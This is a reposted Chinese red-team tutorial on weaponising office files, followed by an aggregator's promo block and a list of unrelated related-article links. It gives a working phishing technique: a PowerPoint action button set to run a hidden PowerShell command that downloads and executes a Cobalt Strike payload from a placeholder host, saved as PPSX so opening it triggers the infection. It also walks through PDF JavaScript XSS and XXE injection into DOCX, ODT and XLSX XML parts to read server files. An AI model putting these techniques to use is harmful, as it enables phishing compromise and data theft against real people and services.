当前位置: 首页 > news >正文

实战攻防中关于文档的妙用

一、PPT钓鱼
  1. 简单制作一个用于钓鱼的PPTX文件

一般那种小白不知道PPT也能拿来钓鱼,这里主要是借用PPT中的”动作按钮”,
我们在插入的地方,选择“动作按钮”

图片


然后在弹出的窗口处:

图片


比如填入上线CS的语句:
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:80/a'))"
最后我们将ppt格式保存为ppsx格式,打开即可上线

图片

二、PDF在漏洞挖掘和红队中的一些攻击姿势

使用PDF进行XSS攻击【这个有点鸡肋,只是一种思路】
一个也不算新的攻击点,它的攻击场景其实说常见也常见说不常见也不常见,如果在日常日站中能遇到一些站的文件上传允许上传PDF,能在线解析上传的PDF,用户可以在线浏览PDF文件的,那么久可能存在XSS攻击漏洞,废话不多说,我们来制作一个恶意PDF文件,方法如下:
找一个PDF编辑器,我这边用的是迅捷,其他的编辑器应该是差不多,点击左上角选择新建空白页

图片


单机左侧的“页面“标签,选择与之对应的页面缩略图,然后从选项下拉菜单中选择“页面属性”命令

图片


也可以在这个位置找到

图片


在“页面属性”对话框单击“动作”标签,再从“选择动作”下拉菜单中选择“运行 JavaScript”命令,然后单击【添加】按钮,弹出 JavaScript 编辑器对话框

图片


在弹出的“JavaScript 编辑器”对话框中输入代码:
app.alert(‘XSS’);

图片


我们保存后,用浏览器打开这个pdf文件[]

图片

三、使用Word文档进行XXE攻击

1、DOCX文档的构造
使用docx文档进行xxe攻击,一般小白听都没听过,就感觉很高级的赶脚,其实ta的原理非常简单,打过CTF比赛的小伙伴们应该都知道docx本质上是压缩包,是把一堆xml文件按照一定格式压缩在一起

图片


下图可以清晰的看到DOCX文档的实际构成

图片


既然是xml文件,我们知道xxe攻击的本质上就是后端在处理XML相关数据的时候也执行了我们的恶意XML语句,那么我们可以把恶意语句嵌入到DOCX文档中的某些xml文件中,想办法让网站触发
这个方法的关键点在于,要去寻找那种网站本身可以阅读DOCX文档或者在线解析DOCX文档的功能,一定绕不开解析DOCX文档里的XML文件,所以那种网盘在线阅读DOCX文档、网站在线解析DOCX文档、邮件系统传输DOCX文档等等功能都有可能存在这类漏洞,下面讲讲利用姿势

  • 第一个回显位置
    这个位置在word/document.xml文件中
    把它打开后发现是这样的

图片


第一个位点在文档声明的下方,也就是这个位置

图片

可以嵌入恶意代码,比如:

图片


然后将这个压缩包的后缀改为DOCX,就获得了一个用于xxe攻击的DOCX文档

  • 第二个回显位置
    这个功能点所处的位置是docProps/app.xml

图片


可以清楚的看到控制页码的标签是

图片


在Pages标签中嵌入XXE攻击语句即可

图片


然后和上面一样将这个压缩包的后缀名修改为DOCX,就得到了一个用于xxe攻击的DOCX文档
2、利用Word OLE功能进行XXE攻击
这个手法主要用于攻击Libreoffice,Libreoffice是很多Word转PDF网站的常客,实战情况下有机会遇到
先创建一个OLE对象

图片


选择由文件创建

图片


这个文件名的绝对路径可以自己填,插入好之后将这个文档先保存为.odt格式

图片


然后老样子,把它后缀改为.zip格式再修改其中的XML文件,在content.xml中找到第一个xlink:href 其中的路径修改为你想要读的文件

图片


最后把它重新改成Docx格式即可

四、使用Excel文档来进行XXE攻击

使用Excel文档进行XXE攻击的原理基本与Word文档进行攻击的原理一致,Excel文档也是由XML文件按照一定的格式压缩在一起的。它们的输出位点也非常相似,把xlxs文档后缀改为zip,找到xl/workbook.xml文件。

图片


同样在XML声明行的下面有一个输出位点

图片


填入恶意语句
将压缩包后缀重新改回xlxs文件即可得到一个恶意Excel文件

   申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

http://www.lryc.cn/news/345082.html

相关文章:

  • 【使用ChatGPT的API之前】OpenAI API提供的可用模型
  • 【C语言】模拟实现深入了解:字符串函数
  • 钩子函数onMounted定义了太多访问MySQL的操作 导致数据库异常
  • Excel文件解析---超大Excel文件读写
  • TypeScript基础:类型系统介绍
  • 【Unity】Unity项目转抖音小游戏(一) 项目转换
  • element-ui 中修改loading加载样式
  • QT登录界面,(页面的切换)
  • 计算机毕业设计 | vue+springboot汽车销售管理系统(附源码)
  • 一款开源的原神工具箱,专为现代化 Windows 平台设计,旨在改善桌面端玩家的游戏体验
  • python日常消费数据占比分析总结年消费方向
  • MySQL变量的浮点数问题处理
  • MWeb Pro for Mac:功能强大的Markdown博客编辑器
  • 基于FPGA实现的HDMI TO MIPI扩展显示器方案
  • 2024年美国市场亚太游戏品牌数字广告洞察报告
  • DDD面试题:DDD聚合和表的对应关系是什么 ?(来自蚂蚁面试)
  • 【华为】路由策略小实验
  • docker安装elasticsearch:7.17.21
  • 10.Java对象内置结构
  • 【ITK配准】第十五期 基于运动算法的可变形配准样例
  • CSP-j 计算机硬件
  • Java中使用RediSearch进行高效数据检索
  • NASA数据集——全球土壤顶部 1 厘米土壤湿度的网格估算值25km分辨率
  • 翼支付——风控场景中图模型的范式变迁
  • Edge视频增强功能
  • C++ 概览并发
  • 04-19 周四 GitHub CI 方案设计
  • java日常选择题
  • 安卓串口通訊三
  • 嵌入式交叉编译:Unable to find arm_neon.h